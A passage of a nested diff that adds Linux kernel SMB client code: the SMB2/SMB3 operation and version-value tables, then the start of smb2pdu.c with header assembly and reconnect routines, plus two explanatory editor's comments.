++	.revert_current_mid = smb2_revert_current_mid,
++	.read_data_offset = smb2_read_data_offset,
++	.read_data_length = smb2_read_data_length,
++	.map_error = map_smb2_to_linux_error,
++	.find_mid = smb2_find_mid,
++	.check_message = smb2_check_message,
++	.dump_detail = smb2_dump_detail,
++	.clear_stats = smb2_clear_stats,
++	.print_stats = smb2_print_stats,
++	.dump_share_caps = smb2_dump_share_caps,
++	.is_oplock_break = smb2_is_valid_oplock_break,
++	.handle_cancelled_mid = smb2_handle_cancelled_mid,
++	.downgrade_oplock = smb3_downgrade_oplock,
++	.need_neg = smb2_need_neg,
++	.negotiate = smb2_negotiate,
++	.negotiate_wsize = smb3_negotiate_wsize,
++	.negotiate_rsize = smb3_negotiate_rsize,
++	.sess_setup = SMB2_sess_setup,
++	.logoff = SMB2_logoff,
++	.tree_connect = SMB2_tcon,
++	.tree_disconnect = SMB2_tdis,
++	.qfs_tcon = smb3_qfs_tcon,
++	.is_path_accessible = smb2_is_path_accessible,
++	.can_echo = smb2_can_echo,
++	.echo = SMB2_echo,
++	.query_path_info = smb2_query_path_info,
++	/* WSL tags introduced long after smb2.1, enable for SMB3, 3.11 only */
++	.query_reparse_tag = smb2_query_reparse_tag,
++	.get_srv_inum = smb2_get_srv_inum,
++	.query_file_info = smb2_query_file_info,
++	.set_path_size = smb2_set_path_size,
++	.set_file_size = smb2_set_file_size,
++	.set_file_info = smb2_set_file_info,
++	.set_compression = smb2_set_compression,
++	.mkdir = smb2_mkdir,
++	.mkdir_setinfo = smb2_mkdir_setinfo,
++	.rmdir = smb2_rmdir,
++	.unlink = smb2_unlink,
++	.rename = smb2_rename_path,
++	.create_hardlink = smb2_create_hardlink,
++	.query_symlink = smb2_query_symlink,
++	.query_mf_symlink = smb3_query_mf_symlink,
++	.create_mf_symlink = smb3_create_mf_symlink,
++	.open = smb2_open_file,
++	.set_fid = smb2_set_fid,
++	.close = smb2_close_file,
++	.close_getattr = smb2_close_getattr,
++	.flush = smb2_flush_file,
++	.async_readv = smb2_async_readv,
++	.async_writev = smb2_async_writev,
++	.sync_read = smb2_sync_read,
++	.sync_write = smb2_sync_write,
++	.query_dir_first = smb2_query_dir_first,
++	.query_dir_next = smb2_query_dir_next,
++	.close_dir = smb2_close_dir,
++	.calc_smb_size = smb2_calc_size,
++	.is_status_pending = smb2_is_status_pending,
++	.is_session_expired = smb2_is_session_expired,
++	.oplock_response = smb2_oplock_response,
++	.queryfs = smb2_queryfs,
++	.mand_lock = smb2_mand_lock,
++	.mand_unlock_range = smb2_unlock_range,
++	.push_mand_locks = smb2_push_mandatory_locks,
++	.get_lease_key = smb2_get_lease_key,
++	.set_lease_key = smb2_set_lease_key,
++	.new_lease_key = smb2_new_lease_key,
++	.generate_signingkey = generate_smb30signingkey,
++	.calc_signature = smb3_calc_signature,
++	.set_integrity  = smb3_set_integrity,
++	.is_read_op = smb21_is_read_op,
++	.set_oplock_level = smb3_set_oplock_level,
++	.create_lease_buf = smb3_create_lease_buf,
++	.parse_lease_buf = smb3_parse_lease_buf,
++	.copychunk_range = smb2_copychunk_range,
++	.duplicate_extents = smb2_duplicate_extents,
++	.validate_negotiate = smb3_validate_negotiate,
++	.wp_retry_size = smb2_wp_retry_size,
++	.dir_needs_close = smb2_dir_needs_close,
++	.fallocate = smb3_fallocate,
++	.enum_snapshots = smb3_enum_snapshots,
++	.notify = smb3_notify,
++	.init_transform_rq = smb3_init_transform_rq,
++	.is_transform_hdr = smb3_is_transform_hdr,
++	.receive_transform = smb3_receive_transform,
++	.get_dfs_refer = smb2_get_dfs_refer,
++	.select_sectype = smb2_select_sectype,
++#ifdef CONFIG_CIFS_XATTR
++	.query_all_EAs = smb2_query_eas,
++	.set_EA = smb2_set_ea,
++#endif /* CIFS_XATTR */
++	.get_acl = get_smb2_acl,
++	.get_acl_by_fid = get_smb2_acl_by_fid,
++	.set_acl = set_smb2_acl,
++	.next_header = smb2_next_header,
++	.ioctl_query_info = smb2_ioctl_query_info,
++	.make_node = smb2_make_node,
++	.fiemap = smb3_fiemap,
++	.llseek = smb3_llseek,
++	.is_status_io_timeout = smb2_is_status_io_timeout,
++	.is_network_name_deleted = smb2_is_network_name_deleted,
++};
++
++struct smb_version_operations smb311_operations = {
++	.compare_fids = smb2_compare_fids,
++	.setup_request = smb2_setup_request,
++	.setup_async_request = smb2_setup_async_request,
++	.check_receive = smb2_check_receive,
++	.add_credits = smb2_add_credits,
++	.set_credits = smb2_set_credits,
++	.get_credits_field = smb2_get_credits_field,
++	.get_credits = smb2_get_credits,
++	.wait_mtu_credits = smb2_wait_mtu_credits,
++	.adjust_credits = smb2_adjust_credits,
++	.get_next_mid = smb2_get_next_mid,
++	.revert_current_mid = smb2_revert_current_mid,
++	.read_data_offset = smb2_read_data_offset,
++	.read_data_length = smb2_read_data_length,
++	.map_error = map_smb2_to_linux_error,
++	.find_mid = smb2_find_mid,
++	.check_message = smb2_check_message,
++	.dump_detail = smb2_dump_detail,
++	.clear_stats = smb2_clear_stats,
++	.print_stats = smb2_print_stats,
++	.dump_share_caps = smb2_dump_share_caps,
++	.is_oplock_break = smb2_is_valid_oplock_break,
++	.handle_cancelled_mid = smb2_handle_cancelled_mid,
++	.downgrade_oplock = smb3_downgrade_oplock,
++	.need_neg = smb2_need_neg,
++	.negotiate = smb2_negotiate,
++	.negotiate_wsize = smb3_negotiate_wsize,
++	.negotiate_rsize = smb3_negotiate_rsize,
++	.sess_setup = SMB2_sess_setup,
++	.logoff = SMB2_logoff,
++	.tree_connect = SMB2_tcon,
++	.tree_disconnect = SMB2_tdis,
++	.qfs_tcon = smb3_qfs_tcon,
++	.is_path_accessible = smb2_is_path_accessible,
++	.can_echo = smb2_can_echo,
++	.echo = SMB2_echo,
++	.query_path_info = smb2_query_path_info,
++	.query_reparse_tag = smb2_query_reparse_tag,
++	.get_srv_inum = smb2_get_srv_inum,
++	.query_file_info = smb2_query_file_info,
++	.set_path_size = smb2_set_path_size,
++	.set_file_size = smb2_set_file_size,
++	.set_file_info = smb2_set_file_info,
++	.set_compression = smb2_set_compression,
++	.mkdir = smb2_mkdir,
++	.mkdir_setinfo = smb2_mkdir_setinfo,
++	.posix_mkdir = smb311_posix_mkdir,
++	.rmdir = smb2_rmdir,
++	.unlink = smb2_unlink,
++	.rename = smb2_rename_path,
++	.create_hardlink = smb2_create_hardlink,
++	.query_symlink = smb2_query_symlink,
++	.query_mf_symlink = smb3_query_mf_symlink,
++	.create_mf_symlink = smb3_create_mf_symlink,
++	.open = smb2_open_file,
++	.set_fid = smb2_set_fid,
++	.close = smb2_close_file,
++	.close_getattr = smb2_close_getattr,
++	.flush = smb2_flush_file,
++	.async_readv = smb2_async_readv,
++	.async_writev = smb2_async_writev,
++	.sync_read = smb2_sync_read,
++	.sync_write = smb2_sync_write,
++	.query_dir_first = smb2_query_dir_first,
++	.query_dir_next = smb2_query_dir_next,
++	.close_dir = smb2_close_dir,
++	.calc_smb_size = smb2_calc_size,
++	.is_status_pending = smb2_is_status_pending,
++	.is_session_expired = smb2_is_session_expired,
++	.oplock_response = smb2_oplock_response,
++	.queryfs = smb311_queryfs,
++	.mand_lock = smb2_mand_lock,
++	.mand_unlock_range = smb2_unlock_range,
++	.push_mand_locks = smb2_push_mandatory_locks,
++	.get_lease_key = smb2_get_lease_key,
++	.set_lease_key = smb2_set_lease_key,
++	.new_lease_key = smb2_new_lease_key,
++	.generate_signingkey = generate_smb311signingkey,
++	.calc_signature = smb3_calc_signature,
++	.set_integrity  = smb3_set_integrity,
++	.is_read_op = smb21_is_read_op,
++	.set_oplock_level = smb3_set_oplock_level,
++	.create_lease_buf = smb3_create_lease_buf,
++	.parse_lease_buf = smb3_parse_lease_buf,
++	.copychunk_range = smb2_copychunk_range,
++	.duplicate_extents = smb2_duplicate_extents,
++/*	.validate_negotiate = smb3_validate_negotiate, */ /* not used in 3.11 */
++	.wp_retry_size = smb2_wp_retry_size,
++	.dir_needs_close = smb2_dir_needs_close,
++	.fallocate = smb3_fallocate,
++	.enum_snapshots = smb3_enum_snapshots,
++	.notify = smb3_notify,
++	.init_transform_rq = smb3_init_transform_rq,
++	.is_transform_hdr = smb3_is_transform_hdr,
++	.receive_transform = smb3_receive_transform,
++	.get_dfs_refer = smb2_get_dfs_refer,
++	.select_sectype = smb2_select_sectype,
++#ifdef CONFIG_CIFS_XATTR
++	.query_all_EAs = smb2_query_eas,
++	.set_EA = smb2_set_ea,
++#endif /* CIFS_XATTR */
++	.get_acl = get_smb2_acl,
++	.get_acl_by_fid = get_smb2_acl_by_fid,
++	.set_acl = set_smb2_acl,
++	.next_header = smb2_next_header,
++	.ioctl_query_info = smb2_ioctl_query_info,
++	.make_node = smb2_make_node,
++	.fiemap = smb3_fiemap,
++	.llseek = smb3_llseek,
++	.is_status_io_timeout = smb2_is_status_io_timeout,
++	.is_network_name_deleted = smb2_is_network_name_deleted,
++};
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++struct smb_version_values smb20_values = {
++	.version_string = SMB20_VERSION_STRING,
++	.protocol_id = SMB20_PROT_ID,
++	.req_capabilities = 0, /* MBZ */
++	.large_lock_type = 0,
++	.exclusive_lock_type = SMB2_LOCKFLAG_EXCLUSIVE,
++	.shared_lock_type = SMB2_LOCKFLAG_SHARED,
++	.unlock_lock_type = SMB2_LOCKFLAG_UNLOCK,
++	.header_size = sizeof(struct smb2_hdr),
++	.header_preamble_size = 0,
++	.max_header_size = MAX_SMB2_HDR_SIZE,
++	.read_rsp_size = sizeof(struct smb2_read_rsp) - 1,
++	.lock_cmd = SMB2_LOCK,
++	.cap_unix = 0,
++	.cap_nt_find = SMB2_NT_FIND,
++	.cap_large_files = SMB2_LARGE_FILES,
++	.signing_enabled = SMB2_NEGOTIATE_SIGNING_ENABLED | SMB2_NEGOTIATE_SIGNING_REQUIRED,
++	.signing_required = SMB2_NEGOTIATE_SIGNING_REQUIRED,
++	.create_lease_size = sizeof(struct create_lease),
++};
++#endif /* ALLOW_INSECURE_LEGACY */
++
++struct smb_version_values smb21_values = {
++	.version_string = SMB21_VERSION_STRING,
++	.protocol_id = SMB21_PROT_ID,
++	.req_capabilities = 0, /* MBZ on negotiate req until SMB3 dialect */
++	.large_lock_type = 0,
++	.exclusive_lock_type = SMB2_LOCKFLAG_EXCLUSIVE,
++	.shared_lock_type = SMB2_LOCKFLAG_SHARED,
++	.unlock_lock_type = SMB2_LOCKFLAG_UNLOCK,
++	.header_size = sizeof(struct smb2_hdr),
++	.header_preamble_size = 0,
++	.max_header_size = MAX_SMB2_HDR_SIZE,
++	.read_rsp_size = sizeof(struct smb2_read_rsp) - 1,
++	.lock_cmd = SMB2_LOCK,
++	.cap_unix = 0,
++	.cap_nt_find = SMB2_NT_FIND,
++	.cap_large_files = SMB2_LARGE_FILES,
++	.signing_enabled = SMB2_NEGOTIATE_SIGNING_ENABLED | SMB2_NEGOTIATE_SIGNING_REQUIRED,
++	.signing_required = SMB2_NEGOTIATE_SIGNING_REQUIRED,
++	.create_lease_size = sizeof(struct create_lease),
++};
++
++struct smb_version_values smb3any_values = {
++	.version_string = SMB3ANY_VERSION_STRING,
++	.protocol_id = SMB302_PROT_ID, /* doesn't matter, send protocol array */
++	.req_capabilities = SMB2_GLOBAL_CAP_DFS | SMB2_GLOBAL_CAP_LEASING | SMB2_GLOBAL_CAP_LARGE_MTU | SMB2_GLOBAL_CAP_PERSISTENT_HANDLES | SMB2_GLOBAL_CAP_ENCRYPTION | SMB2_GLOBAL_CAP_DIRECTORY_LEASING,
++	.large_lock_type = 0,
++	.exclusive_lock_type = SMB2_LOCKFLAG_EXCLUSIVE,
++	.shared_lock_type = SMB2_LOCKFLAG_SHARED,
++	.unlock_lock_type = SMB2_LOCKFLAG_UNLOCK,
++	.header_size = sizeof(struct smb2_hdr),
++	.header_preamble_size = 0,
++	.max_header_size = MAX_SMB2_HDR_SIZE,
++	.read_rsp_size = sizeof(struct smb2_read_rsp) - 1,
++	.lock_cmd = SMB2_LOCK,
++	.cap_unix = 0,
++	.cap_nt_find = SMB2_NT_FIND,
++	.cap_large_files = SMB2_LARGE_FILES,
++	.signing_enabled = SMB2_NEGOTIATE_SIGNING_ENABLED | SMB2_NEGOTIATE_SIGNING_REQUIRED,
++	.signing_required = SMB2_NEGOTIATE_SIGNING_REQUIRED,
++	.create_lease_size = sizeof(struct create_lease_v2),
++};
++
++struct smb_version_values smbdefault_values = {
++	.version_string = SMBDEFAULT_VERSION_STRING,
++	.protocol_id = SMB302_PROT_ID, /* doesn't matter, send protocol array */
++	.req_capabilities = SMB2_GLOBAL_CAP_DFS | SMB2_GLOBAL_CAP_LEASING | SMB2_GLOBAL_CAP_LARGE_MTU | SMB2_GLOBAL_CAP_PERSISTENT_HANDLES | SMB2_GLOBAL_CAP_ENCRYPTION | SMB2_GLOBAL_CAP_DIRECTORY_LEASING,
++	.large_lock_type = 0,
++	.exclusive_lock_type = SMB2_LOCKFLAG_EXCLUSIVE,
++	.shared_lock_type = SMB2_LOCKFLAG_SHARED,
++	.unlock_lock_type = SMB2_LOCKFLAG_UNLOCK,
++	.header_size = sizeof(struct smb2_hdr),
++	.header_preamble_size = 0,
++	.max_header_size = MAX_SMB2_HDR_SIZE,
++	.read_rsp_size = sizeof(struct smb2_read_rsp) - 1,
++	.lock_cmd = SMB2_LOCK,
++	.cap_unix = 0,
++	.cap_nt_find = SMB2_NT_FIND,
++	.cap_large_files = SMB2_LARGE_FILES,
++	.signing_enabled = SMB2_NEGOTIATE_SIGNING_ENABLED | SMB2_NEGOTIATE_SIGNING_REQUIRED,
++	.signing_required = SMB2_NEGOTIATE_SIGNING_REQUIRED,
++	.create_lease_size = sizeof(struct create_lease_v2),
++};
++
++struct smb_version_values smb30_values = {
++	.version_string = SMB30_VERSION_STRING,
++	.protocol_id = SMB30_PROT_ID,
++	.req_capabilities = SMB2_GLOBAL_CAP_DFS | SMB2_GLOBAL_CAP_LEASING | SMB2_GLOBAL_CAP_LARGE_MTU | SMB2_GLOBAL_CAP_PERSISTENT_HANDLES | SMB2_GLOBAL_CAP_ENCRYPTION | SMB2_GLOBAL_CAP_DIRECTORY_LEASING,
++	.large_lock_type = 0,
++	.exclusive_lock_type = SMB2_LOCKFLAG_EXCLUSIVE,
++	.shared_lock_type = SMB2_LOCKFLAG_SHARED,
++	.unlock_lock_type = SMB2_LOCKFLAG_UNLOCK,
++	.header_size = sizeof(struct smb2_hdr),
++	.header_preamble_size = 0,
++	.max_header_size = MAX_SMB2_HDR_SIZE,
++	.read_rsp_size = sizeof(struct smb2_read_rsp) - 1,
++	.lock_cmd = SMB2_LOCK,
++	.cap_unix = 0,
++	.cap_nt_find = SMB2_NT_FIND,
++	.cap_large_files = SMB2_LARGE_FILES,
++	.signing_enabled = SMB2_NEGOTIATE_SIGNING_ENABLED | SMB2_NEGOTIATE_SIGNING_REQUIRED,
++	.signing_required = SMB2_NEGOTIATE_SIGNING_REQUIRED,
++	.create_lease_size = sizeof(struct create_lease_v2),
++};
++
++struct smb_version_values smb302_values = {
++	.version_string = SMB302_VERSION_STRING,
++	.protocol_id = SMB302_PROT_ID,
++	.req_capabilities = SMB2_GLOBAL_CAP_DFS | SMB2_GLOBAL_CAP_LEASING | SMB2_GLOBAL_CAP_LARGE_MTU | SMB2_GLOBAL_CAP_PERSISTENT_HANDLES | SMB2_GLOBAL_CAP_ENCRYPTION | SMB2_GLOBAL_CAP_DIRECTORY_LEASING,
++	.large_lock_type = 0,
++	.exclusive_lock_type = SMB2_LOCKFLAG_EXCLUSIVE,
++	.shared_lock_type = SMB2_LOCKFLAG_SHARED,
++	.unlock_lock_type = SMB2_LOCKFLAG_UNLOCK,
++	.header_size = sizeof(struct smb2_hdr),
++	.header_preamble_size = 0,
++	.max_header_size = MAX_SMB2_HDR_SIZE,
++	.read_rsp_size = sizeof(struct smb2_read_rsp) - 1,
++	.lock_cmd = SMB2_LOCK,
++	.cap_unix = 0,
++	.cap_nt_find = SMB2_NT_FIND,
++	.cap_large_files = SMB2_LARGE_FILES,
++	.signing_enabled = SMB2_NEGOTIATE_SIGNING_ENABLED | SMB2_NEGOTIATE_SIGNING_REQUIRED,
++	.signing_required = SMB2_NEGOTIATE_SIGNING_REQUIRED,
++	.create_lease_size = sizeof(struct create_lease_v2),
++};
++
++struct smb_version_values smb311_values = {
++	.version_string = SMB311_VERSION_STRING,
++	.protocol_id = SMB311_PROT_ID,
++	.req_capabilities = SMB2_GLOBAL_CAP_DFS | SMB2_GLOBAL_CAP_LEASING | SMB2_GLOBAL_CAP_LARGE_MTU | SMB2_GLOBAL_CAP_PERSISTENT_HANDLES | SMB2_GLOBAL_CAP_ENCRYPTION | SMB2_GLOBAL_CAP_DIRECTORY_LEASING,
++	.large_lock_type = 0,
++	.exclusive_lock_type = SMB2_LOCKFLAG_EXCLUSIVE,
++	.shared_lock_type = SMB2_LOCKFLAG_SHARED,
++	.unlock_lock_type = SMB2_LOCKFLAG_UNLOCK,
++	.header_size = sizeof(struct smb2_hdr),
++	.header_preamble_size = 0,
++	.max_header_size = MAX_SMB2_HDR_SIZE,
++	.read_rsp_size = sizeof(struct smb2_read_rsp) - 1,
++	.lock_cmd = SMB2_LOCK,
++	.cap_unix = 0,
++	.cap_nt_find = SMB2_NT_FIND,
++	.cap_large_files = SMB2_LARGE_FILES,
++	.signing_enabled = SMB2_NEGOTIATE_SIGNING_ENABLED | SMB2_NEGOTIATE_SIGNING_REQUIRED,
++	.signing_required = SMB2_NEGOTIATE_SIGNING_REQUIRED,
++	.create_lease_size = sizeof(struct create_lease_v2),
++};
+diff --git a/fs/smb/client/smb2pdu.c b/fs/smb/client/smb2pdu.c
+new file mode 100644
+index 0000000000000..3ca593cdda76e
+--- /dev/null
++++ b/fs/smb/client/smb2pdu.c
+@@ -0,0 +1,5722 @@
++// SPDX-License-Identifier: LGPL-2.1
++/*
++ *
++ *   Copyright (C) International Business Machines  Corp., 2009, 2013
++ *                 Etersoft, 2012
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *              Pavel Shilovsky (pshilovsky@samba.org) 2012
++ *
++ *   Contains the routines for constructing the SMB2 PDUs themselves
++ *
++ */
++
++ /* SMB2 PDU handling routines here - except for leftovers (eg session setup) */
++ /* Note that there are handle based routines which must be		      */
++ /* treated slightly differently for reconnection purposes since we never     */
++ /* want to reuse a stale file handle and only the caller knows the file info */
++
++#include <linux/fs.h>
++#include <linux/kernel.h>
++#include <linux/vfs.h>
++#include <linux/task_io_accounting_ops.h>
++#include <linux/uaccess.h>
++#include <linux/uuid.h>
++#include <linux/pagemap.h>
++#include <linux/xattr.h>
++#include "cifsglob.h"
++#include "cifsacl.h"
++#include "cifsproto.h"
++#include "smb2proto.h"
++#include "cifs_unicode.h"
++#include "cifs_debug.h"
++#include "ntlmssp.h"
++#include "smb2status.h"
++#include "smb2glob.h"
++#include "cifspdu.h"
++#include "cifs_spnego.h"
++#include "smbdirect.h"
++#include "trace.h"
++#ifdef CONFIG_CIFS_DFS_UPCALL
++#include "dfs_cache.h"
++#endif
++#include "cached_dir.h"
++
++/*
++ *  The following table defines the expected "StructureSize" of SMB2 requests
++ *  in order by SMB2 command.  This is similar to "wct" in SMB/CIFS requests.
++ *
++ *  Note that commands are defined in smb2pdu.h in le16 but the array below is
++ *  indexed by command in host byte order.
++ */
++static const int smb2_req_struct_sizes[NUMBER_OF_SMB2_COMMANDS] = {
++	/* SMB2_NEGOTIATE */ 36,
++	/* SMB2_SESSION_SETUP */ 25,
++	/* SMB2_LOGOFF */ 4,
++	/* SMB2_TREE_CONNECT */	9,
++	/* SMB2_TREE_DISCONNECT */ 4,
++	/* SMB2_CREATE */ 57,
++	/* SMB2_CLOSE */ 24,
++	/* SMB2_FLUSH */ 24,
++	/* SMB2_READ */	49,
++	/* SMB2_WRITE */ 49,
++	/* SMB2_LOCK */	48,
++	/* SMB2_IOCTL */ 57,
++	/* SMB2_CANCEL */ 4,
++	/* SMB2_ECHO */ 4,
++	/* SMB2_QUERY_DIRECTORY */ 33,
++	/* SMB2_CHANGE_NOTIFY */ 32,
++	/* SMB2_QUERY_INFO */ 41,
++	/* SMB2_SET_INFO */ 33,
++	/* SMB2_OPLOCK_BREAK */ 24 /* BB this is 36 for LEASE_BREAK variant */
++};
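++
++/*
++ * Editor's note (illustrative, not part of the upstream patch): these are
++ * the StructureSize values mandated by MS-SMB2.  The odd values (e.g. 57
++ * for CREATE, 49 for READ and WRITE) count one byte of the variable
++ * length area that follows the fixed part, so the fixed region itself is
++ * StructureSize - 1 bytes.  fill_small_buf() below indexes the table as
++ * smb2_req_struct_sizes[le16_to_cpu(smb2_command)].
++ */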
++
++int smb3_encryption_required(const struct cifs_tcon *tcon)
++{
++	if (!tcon || !tcon->ses)
++		return 0;
++	if ((tcon->ses->session_flags & SMB2_SESSION_FLAG_ENCRYPT_DATA) ||
++	    (tcon->share_flags & SHI1005_FLAGS_ENCRYPT_DATA))
++		return 1;
++	if (tcon->seal &&
++	    (tcon->ses->server->capabilities & SMB2_GLOBAL_CAP_ENCRYPTION))
++		return 1;
++	return 0;
++}
++
++static void
++smb2_hdr_assemble(struct smb2_hdr *shdr, __le16 smb2_cmd,
++		  const struct cifs_tcon *tcon,
++		  struct TCP_Server_Info *server)
++{
++	shdr->ProtocolId = SMB2_PROTO_NUMBER;
++	shdr->StructureSize = cpu_to_le16(64);
++	shdr->Command = smb2_cmd;
++	if (server) {
++		spin_lock(&server->req_lock);
++		/* Request up to 10 credits but don't go over the limit. */
++		if (server->credits >= server->max_credits)
++			shdr->CreditRequest = cpu_to_le16(0);
++		else
++			shdr->CreditRequest = cpu_to_le16(
++				min_t(int, server->max_credits -
++						server->credits, 10));
++		spin_unlock(&server->req_lock);
++	} else {
++		shdr->CreditRequest = cpu_to_le16(2);
++	}
++	shdr->Id.SyncId.ProcessId = cpu_to_le32((__u16)current->tgid);
++
++	if (!tcon)
++		goto out;
++
++	/* GLOBAL_CAP_LARGE_MTU will only be set if dialect > SMB2.02 */
++	/* See sections 2.2.4 and 3.2.4.1.5 of MS-SMB2 */
++	if (server && (server->capabilities & SMB2_GLOBAL_CAP_LARGE_MTU))
++		shdr->CreditCharge = cpu_to_le16(1);
++	/* else CreditCharge MBZ */
++
++	shdr->Id.SyncId.TreeId = cpu_to_le32(tcon->tid);
++	/* Uid is not converted */
++	if (tcon->ses)
++		shdr->SessionId = cpu_to_le64(tcon->ses->Suid);
++
++	/*
++	 * If we would set SMB2_FLAGS_DFS_OPERATIONS on open we also would have
++	 * to pass the path on the Open SMB prefixed by \\server\share.
++	 * Not sure when we would need to do the augmented path (if ever) and
++	 * setting this flag breaks the SMB2 open operation since it is
++	 * illegal to send an empty path name (without \\server\share prefix)
++	 * when the DFS flag is set in the SMB open header. We could
++	 * consider setting the flag on all operations other than open
++	 * but it is safer to not set it for now.
++	 */
++/*	if (tcon->share_flags & SHI1005_FLAGS_DFS)
++		shdr->Flags |= SMB2_FLAGS_DFS_OPERATIONS; */
++
++	if (server && server->sign && !smb3_encryption_required(tcon))
++		shdr->Flags |= SMB2_FLAGS_SIGNED;
++out:
++	return;
++}
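++
++/*
++ * Worked example (editor's note, not part of the upstream patch) for the
++ * CreditRequest computation above, min_t(int, max_credits - credits, 10):
++ *
++ *	credits = 500, max_credits = 512  ->  CreditRequest = 10
++ *	credits = 509, max_credits = 512  ->  CreditRequest = 3
++ *	credits >= max_credits            ->  CreditRequest = 0
++ */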
++
++static int
++smb2_reconnect(__le16 smb2_command, struct cifs_tcon *tcon,
++	       struct TCP_Server_Info *server)
++{
++	int rc = 0;
++	struct nls_table *nls_codepage = NULL;
++	struct cifs_ses *ses;
++
++	/*
++	 * SMB2's NegProt, SessSetup and Logoff do not have a tcon yet, so
++	 * the tcp and smb session status checks are done differently
++	 * for those three - in the calling routine.
++	 */
++	if (tcon == NULL)
++		return 0;
++
++	/*
++	 * Need to also skip SMB2_IOCTL because it is used for checking nested dfs links in
++	 * cifs_tree_connect().
++	 */
++	if (smb2_command == SMB2_TREE_CONNECT || smb2_command == SMB2_IOCTL)
++		return 0;
++
++	spin_lock(&tcon->tc_lock);
++	if (tcon->status == TID_EXITING) {
++		/*
++		 * only tree disconnect allowed when disconnecting ...
++		 */
++		if (smb2_command != SMB2_TREE_DISCONNECT) {
++			spin_unlock(&tcon->tc_lock);
++			cifs_dbg(FYI, "can not send cmd %d while umounting\n",
++				 smb2_command);
++			return -ENODEV;
++		}
++	}
++	spin_unlock(&tcon->tc_lock);
++
++	ses = tcon->ses;
++	if (!ses)
++		return -EIO;
++	spin_lock(&ses->ses_lock);
++	if (ses->ses_status == SES_EXITING) {
++		spin_unlock(&ses->ses_lock);
++		return -EIO;
++	}
++	spin_unlock(&ses->ses_lock);
++	if (!ses->server || !server)
++		return -EIO;
++
++	spin_lock(&server->srv_lock);
++	if (server->tcpStatus == CifsNeedReconnect) {
++		/*
++		 * Return to caller for TREE_DISCONNECT and LOGOFF and CLOSE
++		 * here since they are implicitly done when session drops.
++		 */
++		switch (smb2_command) {
++		/*
++		 * BB Should we keep oplock break and add flush to exceptions?
++		 */
++		case SMB2_TREE_DISCONNECT:
++		case SMB2_CANCEL:
++		case SMB2_CLOSE:
++		case SMB2_OPLOCK_BREAK:
++			spin_unlock(&server->srv_lock);
++			return -EAGAIN;
++		}
++	}
++	spin_unlock(&server->srv_lock);
++
++again:
++	rc = cifs_wait_for_server_reconnect(server, tcon->retry);
++	if (rc)
++		return rc;
++
++	spin_lock(&ses->chan_lock);
++	if (!cifs_chan_needs_reconnect(ses, server) && !tcon->need_reconnect) {
++		spin_unlock(&ses->chan_lock);
++		return 0;
++	}
++	spin_unlock(&ses->chan_lock);
++	cifs_dbg(FYI, "sess reconnect mask: 0x%lx, tcon reconnect: %d",
++		 tcon->ses->chans_need_reconnect,
++		 tcon->need_reconnect);
++
++	mutex_lock(&ses->session_mutex);
++	/*
++	 * Recheck after acquiring the mutex. If another thread is negotiating
++	 * and the server never sends an answer, the socket will be closed
++	 * and tcpStatus set to reconnect.
++	 */
++	spin_lock(&server->srv_lock);
++	if (server->tcpStatus == CifsNeedReconnect) {
++		spin_unlock(&server->srv_lock);
++		mutex_unlock(&ses->session_mutex);
++
++		if (tcon->retry)
++			goto again;
++
++		rc = -EHOSTDOWN;
++		goto out;
++	}
++	spin_unlock(&server->srv_lock);
++
++	nls_codepage = load_nls_default();
++
++	/*
++	 * need to prevent multiple threads trying to simultaneously
++	 * reconnect the same SMB session
++	 */
++	spin_lock(&ses->ses_lock);
++	spin_lock(&ses->chan_lock);
++	if (!cifs_chan_needs_reconnect(ses, server) &&
++	    ses->ses_status == SES_GOOD) {
++		spin_unlock(&ses->chan_lock);
++		spin_unlock(&ses->ses_lock);
++		/* this means that we only need to tree connect */
++		if (tcon->need_reconnect)
++			goto skip_sess_setup;
++
++		mutex_unlock(&ses->session_mutex);
++		goto out;
++	}
++	spin_unlock(&ses->chan_lock);
++	spin_unlock(&ses->ses_lock);
++
++	rc = cifs_negotiate_protocol(0, ses, server);
++	if (!rc) {
++		rc = cifs_setup_session(0, ses, server, nls_codepage);
++		if ((rc == -EACCES) && !tcon->retry) {
++			mutex_unlock(&ses->session_mutex);
++			rc = -EHOSTDOWN;
++			goto failed;
++		} else if (rc) {
++			mutex_unlock(&ses->session_mutex);
++			goto out;
++		}
++	} else {
++		mutex_unlock(&ses->session_mutex);
++		goto out;
++	}
++
++skip_sess_setup:
++	if (!tcon->need_reconnect) {
++		mutex_unlock(&ses->session_mutex);
++		goto out;
++	}
++	cifs_mark_open_files_invalid(tcon);
++	if (tcon->use_persistent)
++		tcon->need_reopen_files = true;
++
++	rc = cifs_tree_connect(0, tcon, nls_codepage);
++	mutex_unlock(&ses->session_mutex);
++
++	cifs_dbg(FYI, "reconnect tcon rc = %d\n", rc);
++	if (rc) {
++		/* If sess reconnected but tcon didn't, something strange ... */
++		cifs_dbg(VFS, "reconnect tcon failed rc = %d\n", rc);
++		goto out;
++	}
++
++	if (smb2_command != SMB2_INTERNAL_CMD)
++		mod_delayed_work(cifsiod_wq, &server->reconnect, 0);
++
++	atomic_inc(&tconInfoReconnectCount);
++out:
++	/*
++	 * Check if this is a handle-based operation, so we know whether we
++	 * can continue or must return to the caller to reset the file handle.
++	 */
++	/*
++	 * BB Is flush done by server on drop of tcp session? Should we special
++	 * case it and skip above?
++	 */
++	switch (smb2_command) {
++	case SMB2_FLUSH:
++	case SMB2_READ:
++	case SMB2_WRITE:
++	case SMB2_LOCK:
++	case SMB2_IOCTL:
++	case SMB2_QUERY_DIRECTORY:
++	case SMB2_CHANGE_NOTIFY:
++	case SMB2_QUERY_INFO:
++	case SMB2_SET_INFO:
++		rc = -EAGAIN;
++	}
++failed:
++	unload_nls(nls_codepage);
++	return rc;
++}
++
++static void
++fill_small_buf(__le16 smb2_command, struct cifs_tcon *tcon,
++	       struct TCP_Server_Info *server,
++	       void *buf,
++	       unsigned int *total_len)
++{
++	struct smb2_pdu *spdu = buf;
++	/* lookup word count ie StructureSize from table */
++	__u16 parmsize = smb2_req_struct_sizes[le16_to_cpu(smb2_command)];
++
++	/*
++	 * smaller than SMALL_BUFFER_SIZE but bigger than the fixed area of
++	 * the largest operations (Create)
++	 */
++	memset(buf, 0, 256);
++
++	smb2_hdr_assemble(&spdu->hdr, smb2_command, tcon, server);
++	spdu->StructureSize2 = cpu_to_le16(parmsize);
++
++	*total_len = parmsize + sizeof(struct smb2_hdr);
++}
++
++/*
++ * Allocate and return pointer to an SMB request hdr, and set basic
++ * SMB information in the SMB header. If the return code is zero, this
++ * function must have filled in request_buf pointer.
++ */
